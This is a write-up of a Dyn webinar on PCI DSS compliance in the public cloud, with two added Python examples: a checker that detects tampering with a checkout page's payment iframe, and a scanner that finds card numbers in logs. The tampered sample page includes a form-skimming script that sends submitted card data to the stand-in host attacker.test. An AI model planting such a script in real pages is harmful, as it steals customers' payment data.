A Look At PCI Compliance with Dyn's Chris Brenton and Cory von Wallenstein

Dyn's Cory von Wallenstein and Chris Brenton conducted a webinar on PCI compliance and how DNS fits in.


  1. DNS Security: PCI In The Public Cloud (November 20, 2013)
  2. Your Presenters: Cory von Wallenstein, Chief Technologist (@cvwdyn); Chris Brenton, Director of Security (@Chris_Brenton). DNS Security: PCI In The Public Cloud @dyn @cvwdyn @chris_brenton
  3. What We'll Talk About • PCI: the reality of non-compliance • Can you be compliant in the public cloud? • Analyzing scope • Should you outsource?
  4. Payment Card Industry Data Security Standards: what's at stake? • Trust & confidence of customers • Fines & loss of merchant privileges
  5. Visa merchant compliance statistics: http://usa.visa.com/download/merchants/cisp-pcidss-compliancestats.pdf
  6. Cost of Breach (May 2013 study by Ponemon Institute) • 277 orgs in nine countries • $136 average cost per record breached (Germany $199, USA $188) • 2,300 to 99,000 records, average of 23,647 records breached
  7. Compliance & Data Breach Correlation (April 2011 study by Ponemon Institute) • Breach in past 24 months: 2009 -> 79%, 2011 -> 85% • 12% believed PCI DSS compliance reduced loss; 50% unsure • 64% of compliant companies: no breach in 24 months • 38% of non-compliant companies could say the same
  8. Let's Cut To The Chase. Can PCI DSS compliance be achieved in public cloud? • Yes, and folks are doing it • PCI Council released guidelines last year
  9. Let's Cut To The Chase. There are three paths before you: • The easy way: work with a PCI DSS certified CSP • The hard way: work with non-certified CSPs • The other hard way: do it all yourself
  10. Let's Cut To The Chase. All are possibilities: • One leads to less gray hair • We'll discuss your options today
  11-14. Where To Start • Limit scope as much as possible! • The fewer components touched by CC#'s the better • PCI DSS is extremely broad: o Network security o Host security o Policy security o Process security o Malware protection o Access and identity management • Reducing scope minimizes control pain points
  15-17. Ways to Limit Scope • Understand the flow of CC#'s in your system o Are there opportunities to minimize interaction? • Segregate systems processing CC#'s as much as possible • Can some or all of the process be outsourced? o This is where CSPs can come in o We'll expand on this point in later slides
  18. Helpful PCI Cloud Guidance? PCI DSS = 75 pages of compliance goodness
  19. Helpful PCI Cloud Guidance? PCI Cloud SIG Guidance = 52 pages describing how to apply those 75 pages to… • Public cloud • Private cloud • Hybrid cloud • IaaS, PaaS, SaaS • Nested providers • Oh my…
  20. The Bottom Line • PCI in public cloud is a shared responsibility model • You can't completely exempt yourself from accountability for PCI controls • However, you can limit the scope of the number of controls you are responsible for
  21. Cloud Responsibility Delineation
  22. Study Figure 3
  23-25. Zuora as an Example • PCI Level 1 compliant • Z-Payment offering o Redirect all payments via iframe o All processing and storage takes place on their systems • What does this do to scope? o Can you validate that changes in the redirect code are detected? o You may be eligible to complete SAQ A o 15 questions versus 300+ o Responsible for far fewer controls
  26. Gap Analysis • Get a copy of the CSP's scope and responsibility documentation • This will identify which controls they have accepted responsibility for • Whatever is left is up to you to maintain
  27. Scope & Responsibility Example - CSP
  28. Scope & Responsibility Example - Client
  29-34. A Basic Checklist • Understand the flow of credit card info o What processes/services handle it? o What communications exchange it? o What drives/partitions store it? • Understand what SaaS services will have admin control o Can be in scope if controlling servers handling credit card info • Flow diagrams are your friend; leverage them • Delineate portions that are internal vs. external • For internal portions, you need to address all 12 PCI requirements • For external portions o Understand the CSP's scope and responsibility documentation o Fill in the gaps as required
  35-39. What if the CSP is not PCI compliant? • This is where things get painful • Your assessment will need to include the CSP's controls • Extremely expensive and problematic • Will require assurances the CSP will maintain compliance • Consider this your worst case option
  40. What if my CSP gets 0wn3d? • Depends on whether the CSP is an approved service provider
  41. What if my CSP gets 0wn3d? • Historically, merchants not liable when an approved vendor messes up o Heartland is a great example
  42. What if my CSP gets 0wn3d? • If the CSP is not approved, you could still be on the hook.
  43. What if my CSP gets 0wn3d? • Two examples: o What if Zuora gets compromised? o What if box.net gets compromised?
  44. Final Thoughts. Can PCI DSS compliance be achieved in public cloud? • Yes, and folks are doing it
  45. Final Thoughts. The easy way: • Work with a PCI DSS certified CSP • Perform a gap analysis against the CSP's "PCI scope and responsibility" documentation o Their scope should include any nested providers • Make sure you fill in all the gaps
  46. Final Thoughts. The hard way: • Work with a CSP that has not achieved PCI compliance • Your auditor must scope and review their environment • You essentially must certify the CSP while footing the bill
  47. Questions? Cory von Wallenstein, Chief Technologist (@cvwdyn); Chris Brenton, Director of Security (@Chris_Brenton)
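Slides 23-25 raise the question "Can you validate that changes in the redirect code are detected?" when the merchant page does nothing but load a hosted payment form in an iframe. The point is that the merchant page still decides where the cardholder enters the card number, so anything that can alter that (the iframe src, loaded scripts, inline script) has to be fingerprinted and compared against an approved baseline. The following is an added example of such a check; it is not code from the webinar, from Dyn or from Zuora, and the payment hostname, the HTML pages and the attacker domain in it are constructed for the example.

```python
"""Detect unauthorized changes to the payment-redirect code on a checkout page.

Added example (not from the Dyn webinar or from any payment provider).
The merchant page keeps only an iframe pointing at the hosted payment form;
everything that can change where cardholder data goes (iframe src, external
script src, inline script bodies) is fingerprinted and compared against an
approved baseline. Hostnames and HTML below are constructed for the example.
"""
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the hosted payment form is only ever served from this host.
APPROVED_PAYMENT_HOSTS = {"payments.example-csp.test"}


class _RedirectCodeParser(HTMLParser):
    """Collects iframe/script sources and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self.inline = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])
        elif tag == "script":
            if a.get("src"):
                self.scripts.append(a["src"])
            else:
                self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data; keep non-empty chunks.
        if self._in_script and data.strip():
            self.inline.append(data.strip())


def extract_redirect_code(html):
    p = _RedirectCodeParser()
    p.feed(html)
    return {
        "iframes": p.iframes,
        "scripts": p.scripts,
        "inline_sha256": [hashlib.sha256(s.encode()).hexdigest() for s in p.inline],
    }


def fingerprint(html):
    """Stable digest of everything that decides where card data is sent.
    Ordinary page copy (headings, text) is deliberately not part of it."""
    rc = extract_redirect_code(html)
    canon = "\n".join(
        ["iframe:" + s for s in sorted(rc["iframes"])]
        + ["script:" + s for s in sorted(rc["scripts"])]
        + ["inline:" + h for h in sorted(rc["inline_sha256"])]
    )
    return hashlib.sha256(canon.encode()).hexdigest()


def check_page(html, baseline_fp):
    """Return a list of findings; empty means the redirect code is unchanged and sane."""
    findings = []
    rc = extract_redirect_code(html)
    for src in rc["iframes"]:
        u = urlparse(src)
        if u.scheme != "https" or u.hostname not in APPROVED_PAYMENT_HOSTS:
            findings.append(f"iframe points outside approved payment host: {src}")
    if fingerprint(html) != baseline_fp:
        findings.append("redirect code fingerprint differs from approved baseline")
    return findings


# Constructed sample pages: the approved checkout page and a tampered copy
# whose iframe now goes to a look-alike host and which skims the form.
APPROVED_PAGE = """<html><body>
<h1>Checkout</h1>
<iframe src="https://payments.example-csp.test/hosted/form?merchant=123"></iframe>
</body></html>"""

TAMPERED_PAGE = """<html><body>
<h1>Checkout</h1>
<iframe src="https://payments.example-csp.test.attacker.test/hosted/form?merchant=123"></iframe>
<script>document.addEventListener('submit', e => fetch('https://attacker.test/c', {method: 'POST', body: new FormData(e.target)}));</script>
</body></html>"""

if __name__ == "__main__":
    baseline = fingerprint(APPROVED_PAGE)
    print("approved page:", check_page(APPROVED_PAGE, baseline) or "OK")
    print("tampered page:", check_page(TAMPERED_PAGE, baseline))
```

Run it periodically against the live checkout page (fetched the way a customer's browser would fetch it) and alert on any non-empty result; the baseline fingerprint should only change through your own change-control process, which is the evidence an assessor will ask for when the page sits out of scope under SAQ A.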

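Slides 15-17 and 29-34 both start from the same step: find out which processes, communications and drives actually touch card numbers, because anything that does is in scope. In practice the data-flow diagram is only as good as the discovery behind it, and card numbers routinely turn up in debug logs and exports nobody drew on the diagram. The following is an added example of that discovery step, not code from the webinar or from Dyn: it scans text sources for digit runs that pass the Luhn check and reports masked hits per file and line. The file names, log lines and CSV rows are constructed; the card numbers are published test numbers, not real accounts.

```python
"""Find where primary account numbers (PANs) actually live, to scope PCI DSS.

Added example, not from the Dyn webinar. Scans text sources (log lines,
exports, config) for 13-19 digit runs, optionally separated by spaces or
dashes, that pass the Luhn check, so components that "shouldn't" hold card
numbers but do are pulled into scope before an assessor finds them.
Sample inputs below are constructed; the PANs are published test numbers.
"""
import re

# 13-19 digits, single spaces or dashes allowed between digits, and not
# embedded in a longer digit run (so a 22-digit transaction ID is skipped).
_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")


def luhn_ok(digits):
    """Luhn check: every second digit from the right is doubled (minus 9 if > 9)."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(digits):
    """Keep first six and last four, the usual PCI-permitted display form."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def find_pans(text, source="<stdin>"):
    """Return [(source, line_no, masked_pan)] for every Luhn-valid candidate."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for m in _CANDIDATE.finditer(line):
            digits = re.sub(r"[ -]", "", m.group())
            if 13 <= len(digits) <= 19 and luhn_ok(digits):
                hits.append((source, n, mask(digits)))
    return hits


def scan_sources(sources):
    """sources: {name: text}. Returns all hits across them, in input order."""
    hits = []
    for name, text in sources.items():
        hits.extend(find_pans(text, name))
    return hits


# Constructed sample sources: a 16-digit order ID that fails Luhn (ignored),
# a debug line that leaked a full PAN, an already-masked receipt line
# (ignored), a CSV export with a dash-separated PAN, and a config file.
SAMPLE_SOURCES = {
    "app/web.log": "\n".join([
        "2013-11-20T10:01:02 INFO order=1234567890123456 status=paid",
        "2013-11-20T10:01:03 DEBUG form={'pan': '4111 1111 1111 1111', 'exp': '12/15'}",
        "2013-11-20T10:01:04 INFO receipt pan=411111******1111",
    ]),
    "exports/orders.csv": "id,card,amount\n42,5500-0000-0000-0004,19.99\n43,tok_8f3a9c,5.00",
    "etc/app.conf": "db_host=10.0.0.12\nmax_conn=64",
}

if __name__ == "__main__":
    for source, line_no, masked in scan_sources(SAMPLE_SOURCES):
        print(f"{source}:{line_no}: {masked}")
```

Every hit is a component that belongs on the flow diagram and inside the segmentation boundary, or a leak to fix (the debug line above is the classic case). Expect some false positives: long numeric identifiers and timestamps pass Luhn one time in ten, so review hits rather than acting on counts, and treat masked or tokenised values (the receipt line and the `tok_` column) as the goal state for anything that does not need the full PAN.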